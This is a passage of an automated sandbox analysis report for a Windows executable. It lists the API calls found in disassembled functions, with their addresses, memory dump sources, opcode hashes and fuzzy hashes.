                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                      • Opcode ID: 2c1de46c9de125277af46efb28eff1ccda4c71d9005682545634e4999e14e04f
                                                                                                                                                                                                                                      • Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c1de46c9de125277af46efb28eff1ccda4c71d9005682545634e4999e14e04f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404EE8
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404EF3
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                                                                                                                                                                                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404FCA
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                                                                                                                                                                                                                                        • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 0040512C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 0040530A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004054B4
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004054BF
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004054C6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                                                                                      • API String ID: 2564846305-813528018
                                                                                                                                                                                                                                      • Opcode ID: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                                                                                      • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404702
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404723
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040479E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 004047A5
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004047D0
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404824
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404840
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                      • String ID: : Completed$N
                                                                                                                                                                                                                                      • API String ID: 3103080414-2140067464
                                                                                                                                                                                                                                      • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                                                                                                                                                                                                      • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                      • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                      • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                                                                                                                                                                                                      • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191
                                                                                                                                                                                                                                        • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                                                                                        • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004061CC
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004062B5
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                                                                                                                                                                                                                                        • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                                                                                        • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                      • Opcode ID: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                                                                                                                                                                                                                                      • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00404525
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404531
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 0040453D
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404550
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404560
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040457A
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404584
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                      • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                      • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                                                                        • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                      • String ID: 9
                                                                                                                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                      • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                                                                                                                                                                                                      • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                                                                                                                                                                                                      • CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                                                                                                                                                                                                      • CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 589700163-2246974252
                                                                                                                                                                                                                                      • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
